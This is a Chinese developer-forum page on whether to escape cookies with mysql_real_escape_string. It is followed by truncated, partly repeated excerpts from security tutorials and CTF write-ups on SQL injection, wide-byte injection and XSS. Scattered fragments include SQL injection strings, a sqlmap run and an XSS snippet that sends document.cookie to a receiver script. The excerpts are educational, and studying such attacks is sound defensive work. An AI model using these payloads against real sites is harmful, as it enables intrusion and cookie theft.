开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

我应该mysql_real_escape_string我从用户那里得到的所有cookie,以避免在php中注入mysql？

MySQL_Real_Escape_String 是 PHP 中的一个函数，用于将特殊字符转义以防止 SQL 注入。当您在从用户那里获取所有 Cookie 的场景下想要使用此函数时，请确保对所有数据进行过滤和验证。一种安全的方法是在 PHP 中使用 input sanitization 或 prepared statements 以确保用户提供的值不会对您数据库造成损害。

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

8个与安全相关的PHP函数

1. mysql_real_escape_string() 这个函数对于在PHP中防止SQL注入攻击很有帮助，它对特殊的字符，像单引号和双引号，加上了“反斜杠”，确保用户的输入在用它去查询以前已经是安全的了...但现在mysql_real_escape_string()这个函数基本不用了，所有新的应用开发都应该使用像PDO这样的库对数据库进行操作，也就是说，我们可以使用现成的语句防止SQL注入攻击。...默认情况下， magic_quotes_gpc 为 on，对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。...6. md5() 一些开发者存储的密码非常简单，这从安全的角度上看是不好的，md5()函数可以产生给定字符串的32个字符的md5散列，而且这个过程不可逆，即你不能从md5()的结果得到原始字符串...8. intval() 不要笑，我知道这不是一个和安全相关的函数，它是在将变量转成整数类型。但是，你可以用这个函数让你的PHP代码更安全，特别是当你在解析id，年龄这样的数据时。

88812 0

浅析白盒审计中的字符编码及SQL注入

在php文档中，大家会发现一个函数，mysql_real_escape_string，文档里说了，考虑到连接的当前字符集。 ?...为什么，明明我用了mysql_real_escape_string，但却仍然不能抵御宽字符注入。原因就是，你没有指定php连接mysql的字符集。...0×04 宽字符注入的修复在3中我们说到了一种修复方法，就是先调用mysql_set_charset函数设置连接所使用的字符集为gbk，再调用mysql_real_escape_string来过滤用户输入...比如，我们的phithon内容管理系统v2.0版本更新如下： ? 已经不能够注入了： ? 在我审计过的代码中，大部分cms是以这样的方式来避免宽字符注入的。...矫正人们对于mysql_real_escape_string的误解，单独调用set names gbk和mysql_real_escape_string是无法避免宽字符注入问题的。

8413 1

PHP 安全与性能

SHELL 命令注入 3.1. 彻底解决目录于文件的安全 3.2. Session / Cookie安全 3.3. 注入安全 4....内部开发人员偷偷将一个程序植入到系统中，这个做code review 可以避免如何避免这样问题出现,有一个办法，我们新建一个用户www, webserver 进程是nobody，程序目录/var/www...Session / Cookie安全 session.save_path 默认session 存储在/tmp, 并且一明文的方式将变量存储在以sess_为前缀的文件中 $ cat session.php...php // 转义用户名和密码，以便在 SQL 中使用 $user = mysql_real_escape_string($user); $pass = mysql_real_escape_string...否则用户是没有耐心等待你的网站打开. 4.1. timeout 下面的流程展示了从用户打开浏览器到页面展示出来的整个流程, 每个流程都可能出现 timeout user -> dns -> web server

1.6K6 1

PHP 安全与性能

SHELL 命令注入 3.1. 彻底解决目录于文件的安全 3.2. Session / Cookie安全 3.3. 注入安全 4....内部开发人员偷偷将一个程序植入到系统中，这个做code review 可以避免如何避免这样问题出现,有一个办法，我们新建一个用户www, webserver 进程是nobody，程序目录/var/www...Session / Cookie安全 session.save_path 默认session 存储在/tmp, 并且一明文的方式将变量存储在以sess_为前缀的文件中 $ cat session.php...php // 转义用户名和密码，以便在 SQL 中使用 $user = mysql_real_escape_string($user); $pass = mysql_real_escape_string...否则用户是没有耐心等待你的网站打开. 4.1. timeout 下面的流程展示了从用户打开浏览器到页面展示出来的整个流程, 每个流程都可能出现 timeout user -> dns -> web server

1.9K6 0

bwapp之sql注入_sql注入语句入门

High 采用了mysql_real_escape_string()函数来防御 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。...Medium&High 分别用了addslashes()和mysql_real_escape_string()函数防御: 且在Medium中, mysql编码为utf-8, 无法用宽字节绕过, 安全。...在js中采用了getJSON来实时更新查询结果, 页面sqli_10-1应该是从sqli_10-2获取数据的: 可以间接的从sqli_10-2.php注入: http://localhost...title=Iron%' and 1=1 %23 也可以在sqli_10-1.php搜索框注入: Iron%' and 1=1 # Medium&High 分别用了addslashes()和mysql_real_escape_string...--batch 记得传cookie, 指定security_level等级, 用–batch选用默认操作最后得到所有数据库: 接下来跑表就不再赘述了。

8.3K3 0

PHP 安全与性能

SHELL 命令注入 3.1. 彻底解决目录于文件的安全 3.2. Session / Cookie安全 3.3. 注入安全 4....内部开发人员偷偷将一个程序植入到系统中，这个做code review 可以避免如何避免这样问题出现,有一个办法，我们新建一个用户www, webserver 进程是nobody，程序目录/var/www...Session / Cookie安全 session.save_path 默认session 存储在/tmp, 并且一明文的方式将变量存储在以sess_为前缀的文件中 $ cat session.php...php // 转义用户名和密码，以便在 SQL 中使用 $user = mysql_real_escape_string($user); $pass = mysql_real_escape_string...否则用户是没有耐心等待你的网站打开. 4.1. timeout 下面的流程展示了从用户打开浏览器到页面展示出来的整个流程, 每个流程都可能出现 timeout user -> dns -> web server

2K5 0

php操作mysql防止sql注入(合集)

PHP 5.4 之前 PHP 指令 magic_quotes_gpc 默认是on，实际上所有的 GET、POST 和 COOKIE 数据都用被 addslashes() 了。...mysql_real_escape_string()防注入详解此方法在php5.5后不被建议使用，在php7中废除。...在传统的写法中，sql查询语句在程序中拼接，防注入(加斜杠)是在php中处理的，然后就发语句发送到mysql中，mysql其实没有太好的办法对传进来的语句判断哪些是正常的，哪些是恶意的，所以直接查询的方法都有被注入的风险...占位符替代sql中的变量 b.替换变量 c.执行 d.得到一个二进制结果集，从二进制结果中取出php结果集 e.遍历结果集使用预处理，一条查询分两步，所以很安全。...但由于各版本差异，pdo在各版本中的实现程度也不一样，有些版本还有bug，我们以php5.3.6做为分界线来进行说明： php5.3.6以下版本 pdo=newPDO("mysql:host=localhost

4.5K2 0

2017 LCTF WriteUp 4篇

=`*`; z.php中的<?=`*`;刚好7个字符，访问后能把当前目录下的所有文件按字母顺序列出，然后执行。...，然后插入用户身份，而member.php中判断用户身份的逻辑用的是 if ($sth->fetch()[0] === 'GUEST'){ $_SESSION['is_guest'] = true; }...只要不为GUEST即可执行后面的代码想到通过竞争，在GUEST还没更新进数据库的时候就登录并访问member.php，从而跳过身份验证这里我的操作是 1.burpsuite Intruder无限POST...login.php进行登录操作 2.burpsuite Intruder无限GET member.php 3.在前面两个都在跑的情况下注册一个账号要注意的是三个操作的cookie必须相同，1和3中的账号密码要相同...emmmmmmmm，看了操作和flag的内容，感觉我用了非预期解，预期解应该是通过输入超长的xdsec###开头的字符串让regiest.php中的正则匹配函数崩溃，从而无法注入用户GUEST身份，后面的就都一样了

1.4K8 0

Sqlilabs通关笔记(四)

注入点判断在passwd直接加反斜杠有报错 uname=admin&passwd=admin&submit=Submit 可以在passwd参数上尝试报错注入界面输入框好像是更新密码的窗口，猜测是对用户输入的密码没有进行检测过滤...注入点判断页面显示yourip应该是请求头的参数参入同时post传入并未有该参数用admin登录成功后发现有User-agents显示 ?...修改密码加反斜杠重新登录未见报错，查看源代码一探究竟有新用户注册文件 New_user.php 修改密码文件 pass_change.php 登录文件 login.php 都使用了mysql_real_escape_string...函数对注册的参数进行过滤但在修改密码文件中却是直接调用username参数猜测可以之间注册一个admin'#用户进而修改admin的密码，代码如下 if (isset($_POST['submit'...'); }} 因为没有报错注入的条件，时间盲注有点漫长可以尝试脚本注册然后再注入，确实有点麻烦但本题目的是：对于存储型的注入,可以先将导致SQL注入的字符预先存到数据库中,当再次调用到这个恶意构造的字符时就可以触发注入

8571 0

PHP 中的转义函数小结

PHP 5.4 之前 PHP 指令 magic_quotes_gpc 默认是 on，实际上所有的 GET、POST 和 COOKIE 数据都用被 addslashes() 了。...在 PHP 中，只有 \0（NULL），\r（回车符），\n（换行符）和 \t（制表符）是预定义的转义序列，而在 C 语言中，上述的所有转换后的字符都是预定义的转义序列。...mysql_real_escape_string() 调用mysql库的函数 mysql_real_escape_string, 在以下字符前添加反斜杠: \x00 \n \r \ ' " \x1a...一共有三个魔术引号指令： (1)magic_quotes_gpc影响到 HTTP 请求数据（GET，POST 和 COOKIE）。不能在运行时改变。在 PHP 中默认值为 on。代码示例： <?...该选项可在运行的时改变，在 PHP 中的默认值为 off。代码示例： <?

3.2K2 0

系统的讲解 - PHP WEB 安全防御

如果已经在用MySQL扩展了，可以对传入的每个参数做验证，并使用框架的ORM进行查询。另外：addslashes 和 mysql_real_escape_string 这种转义是不安全的！...DOM型注入的恶意代码并未显式的包含在web服务器的响应页面中，但会被页面中的js脚本，以变量的形式来访问到，从而来进行实施攻击。...案例存储型：论坛帖子界面input输入框中，输入 />alert("xss") 进行提交。反射型：在浏览器输入框中，输入 /xxx.php?...避免攻击者进行恶意尝试，不应该返回过多的信息，可以统一返回“用户名或密码错误”。短信接口被恶意攻击举例，注册或登录时用户输入手机号码就可直接触发短信接口，这块最容易被攻击者进行短信轰炸。...升级短信接口的验证方法小结文章主要讲解了 SQL注入攻击、XSS攻击、SSRF攻击、CSRF攻击、文件上传漏洞、信息泄露、越权、设计缺陷等八大方面，通过这次的梳理，也使我自己对PHP WEB安全防御有了一个全面了解

1.1K2 0

新手指南：DVWA-1.9全级别教程（完结篇，附实例）之XSS

mysql_real_escape_string(string,connection) 函数会对字符串中的特殊符号（\x00，\n，\r，\，‘，“，\x1a）进行转义。...在通讯地址一栏输入” onchange=alert(2) “并保存，刷新页面，右键查看源码，注入成功： ? 只要尝试在通讯地址一栏中输入新的内容，就会触发XSS，弹框： ?...0×03 CSRF带来的曙光在修改个人资料的过程中，抓包发现这个修改接口并没有任何的防CSRF机制，存在明显的CSRF漏洞： ?...这给鸡肋的XSS漏洞带来了曙光，于是想到了可以结合CSRF攻击实现用户cookie的大面积盗取。...3.当用户尝试修改通讯地址一栏时，就会触发XSS代码，自动发送cookie（其中包含用户id、用户名、密码哈希值、session-id）： ? 这样，大规模盗取用户cookie的攻击也就完成了。

7.1K5 1

什么是宽字节注入_百分号两个字节

在重新详细了解宽字节注入之前，我认为宽字节注入只是出现在网站使用GBK编码的时代，现在已经很少出现了，但是实际上宽字节不只是出现在GBK编码中。...在PHP中，通过iconv()进行编码转换时，也可能出现宽字节注入。...和mysql_real_escape_string是无法避免宽字符注入问题的。...只要我们把前端html/js/css所有编码设置成gbk，mysql/php编码设置成gbk，就不会出现乱码问题。不用画蛇添足地去调用iconv转换编码，造成不必要的麻烦。...参考连接： 1 2 版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。

4112 0

二次注入简单介绍

基本介绍这里所谓的二次注入其实就是将可能导致SQL注入的字符先存入到数据库中，而当我们再次调用这个恶意构造的字符时就可以触发SQL注入，这一种注入在平时并不常见，但是确实是存在的一种注入，故此在这里将其单独拎出来说一下...，但是数据本身还是脏数据，在将数据存入到了数据库中之后开发者就认为数据是可信的，在下一次进行需要进行查询的时候直接从数据库中取出了脏数据，没有进行进一步的检验和处理，这样就会造成SQL的二次注入，比如在第一次插入数据的时候...，数据中带有单引号，直接插入到了数据库中然后在下一次使用中在拼凑的过程中就形成了二次注入：总结起来二次注入其实是分为两个步骤：插入恶意数据引用恶意数据注入思路二次排序注入思路： 1、黑客通过构造数据的形式在浏览器或者其他软件中提交...5、服务端返回执行的处理结果数据信息，黑客可以通过返回的结果数据信息判断二次注入漏洞利用是否成功注入案例这里以Sql-labs中的Less-24为例做演示：程序源代码 login_create.php...> 从以上代码来主要实现用户注册功能，且对用户的账号密码中的特殊字符进行了转义~ login.php <body bgcolor

1301 0

Web安全Day2 - XSS跨站实战攻防

1.XSS漏洞概述 1.1 漏洞简介跨站脚本攻击—XSS（Cross Site Script），是指攻击者通过在Web页面中写入恶意脚本，造成用户在浏览页面时，控制用户浏览器进行操作的攻击方式。...1.2 XSS漏洞原理 1.2.1 反射型非持久型，常见的就是在URL中构造，将恶意链接发送给目标用户。当用户访问该链接时候，会向服务器发起一个GET请求来提交带有恶意代码的链接。...也就是说，客户端的脚本程序可以通过DOM来动态修改页面内容，从客户端获取DOM中的数据并在本地执行。基于这个特性，就可以利用JS脚本来实现XSS漏洞的利用。...cookie="+document.cookie; document.body.appendChild(img); 接收端 <?php $victim = 'XXS得到的 cookie:'....然后，您将如何使用他/她的会话来访问管理以查找SQL注入并使用它来获取代码执行。

1.4K4 0

php get_magic_quotes_gpc()函数用法介绍

[导读] magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据，如包括有:post、get、cookie过来的数据增加转义字符“ ”，以确保这些数据不会引起程序，特别是数据库语句因为特殊字符引起的污染而出现致命的错误...magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据，如包括有:post、get、cookie过来的数据增加转义字符“\”，以确保这些数据不会引起程序，特别是数据库语句因为特殊字符引起的污染而出现致命的错误...正是因为这个选项必须为On，但是又让用户进行配置的矛盾，在PHP6中删除了这个选项，一切的编程都需要在 magic_quotes_gpc=Off下进行了。...在这样的环境下如果不对用户的数据进行转义，后果不仅仅是程序错误而已了。同样的会引起数据库被注入攻击的危险。...既然在PHP6中删除了magic_quotes_gpc这个选项，那么在PHP6中这个函数我想也已经不复存在了。

1K5 0

基于约束的SQL攻击

绝大部分开发者都意识到SQL注入漏洞的存在，在本文我想与读者共同去探讨另一种与SQL数据库相关的漏洞，其危害与SQL注入不相上下，但却不太常见。...php $username = mysql_real_escape_string($_GET['username']); $password = mysql_real_escape_string($_GET...— 完成检查按理说应该不会出错了啊？然而，攻击者依然能够以任意用户身份进行登录！攻击手法在谈论这种攻击手法之前，首先我们需要了解几个关键知识点。...为了侵入任意用户的帐户（在本例中为“vampire”），只需要使用用户名“vampire[许多空白符]1”和一个随机密码进行注册即可。...这样的话，攻击者就能够以原始用户身份登录。这个攻击已经在MySQL和SQLite上成功通过测试。我相信在其他情况下依旧适用。防御手段毫无疑问，在进行软件开发时，需要对此类安全漏洞引起注意。

1.3K9 0

基于约束的SQL攻击

绝大部分开发者都意识到SQL注入漏洞的存在，在本文我想与读者共同去探讨另一种与SQL数据库相关的漏洞，其危害与SQL注入不相上下，但却不太常见。...php $username = mysql_real_escape_string($_GET['username']); $password = mysql_real_escape_string($_GET...— 完成检查按理说应该不会出错了啊？然而，攻击者依然能够以任意用户身份进行登录！攻击手法在谈论这种攻击手法之前，首先我们需要了解几个关键知识点。...为了侵入任意用户的帐户（在本例中为“vampire”），只需要使用用户名“vampire[许多空白符]1”和一个随机密码进行注册即可。...这样的话，攻击者就能够以原始用户身份登录。这个攻击已经在MySQL和SQLite上成功通过测试。我相信在其他情况下依旧适用。防御手段毫无疑问，在进行软件开发时，需要对此类安全漏洞引起注意。

1.2K5 0

WriteUp分享 | LCTF的一道padding oracle攻击+sprintf格式化字符串导致的SQL注入

，这题能做出来，真的是要感谢我的朋友Pr0ph3t给我的指点结合这道题，讲解一下padding oracle的攻击方式 0x01步骤题目大概是这样的逻辑：函数一：get_identity() ?...，如果生成的$id=admin，那你就有session['isadmin']，所以用随机token，加密得到admin这个id的概率是非常小的，所以基本上所有用账号密码的用户登陆都是guest 那管理员怎么登陆呢...token，记住这里的admin，admin不是管理员，可以把它认为是一个很普通的账号，真正的管理员是用token登陆的，这个逻辑当时纳闷了我好久。。。。...用登陆得到的很多token，模仿管理员直接用这些token去访问admin.php，那么就会进入test_identity()函数，进行解密操作，这时候的解密，其实就是将middle和IV(token)...所以这里就能成功注入了，而且可以union注入，记得对payload进行url编码，毕竟太多乱七八糟的符号给出相关payload(未url编码)和截图 id=3&title=%1$ 'union select

1.1K8 0

Sqli-labs 大完结

magic_quotes_gpc开启时用于在预定义字符（单引号、双引号、斜杠、NULL）前加上反斜杠， 5.4.0 始终返回 FALSE，因为这个魔术引号功能已经从 PHP 中移除了。...和上面比较相似，只不过是在referer处的回显 <?php //including the Mysql connect parameters. include(".....这里将我们的各种信息进行了输出 ? 这里使用我们的cookie进行了数据库的查询那么我们应该从这里入手 ? 输入单引号，发生了报错 ?...创建新用户，这里也进行了转义但是，修改密码的地方并没有过滤，那么我们可以进行二次注入那么我们注册一个admin '# 虽然他是转义了，但是仍然在数据库中仍然存好了，sql = "UPDATE users...%df%5c%27，而前面说过，在mysql里认为前两个字符是一个汉字，也就是‘運’，而后面的单引号就逃逸出来了宽字节注入的本质是PHP与MySQL使用的字符集不同，只要低位的范围中含有0x5c的编码

2K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭